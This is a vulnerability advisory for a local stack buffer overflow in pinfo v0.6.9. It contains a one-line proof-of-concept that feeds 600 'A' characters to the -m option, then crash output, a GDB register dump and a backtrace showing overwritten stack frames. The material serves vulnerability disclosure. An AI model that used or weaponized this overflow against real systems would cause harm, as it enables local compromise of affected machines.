# Title: pinfo v0.6.9 - Local Buffer Overflow# Author: Nassim Asrir# Researcher at: Henceforth# Author contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/# CVE: N/A# Download #
$ apt-getinstall pinfo
# POC #
For any Question or discussion about this vuln: https://www.facebook.com/asrirnassim/
$ pinfo -m`python -c'print "A"*600'`
Przemek's Info Viewer v0.6.9
Looking for man page...
Caught signal 11, bye!
Segmentation fault
# GDB Output #
$ gdb pinfo
(gdb) r -m `python -c 'print "A"*600'`
Program received signal SIGSEGV, Segmentation fault.
__GI_getenv (name=0x7ffff79831aa "RM") at getenv.c:84
84 getenv.c: No such file or directory.
(gdb) info registers
rax0x54 84
rbx0x4141414141414141 4702111234474983745<====
rcx0x1a8 424
rdx0x10 16
rsi0x7fffffffdaae 140737488345774
rdi0x7ffff79831a8 140737347334568
rbp0x7fffffffe0a8 0x7fffffffe0a8
rsp0x7fffffffda90 0x7fffffffda90
r8 0x0 0
r9 0x20 32
r100x1ec 492
r110x7ffff796c630 140737347241520
r120x4554 17748
r130x4 4
r140x2 2
r150x7ffff79831aa 140737347334570
rip0x7ffff73c911d 0x7ffff73c911d <__GI_getenv+173>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0(gdb) where
#0__GI_getenv (name=0x7ffff79831aa "RM") at getenv.c:84#10x00007ffff796c661 in initscr () from /lib/x86_64-linux-gnu/libncursesw.so.5#20x000055555556214a in ?? ()#30x000055555555f165 in ?? ()#40x0000555555557552 in ?? ()#50x4141414141414141 in ?? ()#60x4141414141414141 in ?? ()#70x4141414141414141 in ?? ()#80x4141414141414141 in ?? ()#90x4141414141414141 in ?? ()#10 0x4141414141414141 in ?? ()#11 0x4141414141414141 in ?? ()#12 0x4141414141414141 in ?? ()#13 0x4141414141414141 in ?? ()#14 0x4141414141414141 in ?? ()#15 0x4141414141414141 in ?? ()#16 0x4141414141414141 in ?? ()#17 0x4141414141414141 in ?? ()#18 0x4141414141414141 in ?? ()#19 0x4141414141414141 in ?? ()#20 0x4141414141414141 in ?? ()#21 0x4141414141414141 in ?? ()#22 0x4141414141414141 in ?? ()#23 0x4141414141414141 in ?? ()#24 0x4141414141414141 in ?? ()#25 0x4141414141414141 in ?? ()#26 0x4141414141414141 in ?? ()#27 0x4141414141414141 in ?? ()#28 0x4141414141414141 in ?? ()#29 0x4141414141414141 in ?? ()#30 0x4141414141414141 in ?? ()#31 0x4141414141414141 in ?? ()#32 0x4141414141414141 in ?? ()#33 0x4141414141414141 in ?? ()#34 0x4141414141414141 in ?? ()#35 0x4141414141414141 in ?? ()#36 0x4141414141414141 in ?? ()#37 0x4141414141414141 in ?? ()#38 0x4141414141414141 in ?? ()#39 0x4141414141414141 in ?? ()#40 0x4141414141414141 in ?? ()#41 0x00007fffffff0020 in ?? ()#42 0x00007fffffffebaa in ?? ()
---Type <return> to continue, or q <return> to quit---
#43 0x00007fffffffebc2 in ?? ()#44 0x00007fffffffebd6 in ?? ()#45 0x00007fffffffebe1 in ?? ()#46 0x00007fffffffec07 in ?? ()#47 0x00007fffffffec18 in ?? ()#48 0x00007fffffffec48 in ?? ()#49 0x00007fffffffec52 in ?? ()#50 0x00007fffffffec73 in ?? ()#51 0x00007fffffffec7d in ?? ()#52 0x00007fffffffec86 in ?? ()#53 0x00007fffffffec91 in ?? ()#54 0x00007fffffffeca4 in ?? ()#55 0x00007fffffffecb7 in ?? ()#56 0x00007fffffffeccc in ?? ()#57 0x00007fffffffed08 in ?? ()#58 0x00007fffffffed33 in ?? ()#59 0x00007fffffffed58 in ?? ()#60 0x00007fffffffed63 in ?? ()#61 0x00007fffffffed74 in ?? ()#62 0x00007fffffffed84 in ?? ()#63 0x00007fffffffed8f in ?? ()#64 0x00007fffffffedc3 in ?? ()#65 0x00007fffffffeddc in ?? ()#66 0x00007fffffffee0d in ?? ()#67 0x00007fffffffee30 in ?? ()#68 0x00007fffffffee3f in ?? ()#69 0x00007fffffffee47 in ?? ()#70 0x00007fffffffee59 in ?? ()#71 0x00007fffffffee75 in ?? ()#72 0x00007fffffffee82 in ?? ()#73 0x00007fffffffeeb5 in ?? ()#74 0x00007fffffffeed1 in ?? ()#75 0x00007fffffffeeee in ?? ()#76 0x00007fffffffef28 in ?? ()#77 0x00007fffffffef97 in ?? ()#78 0x0000000000000000 in ?? ()
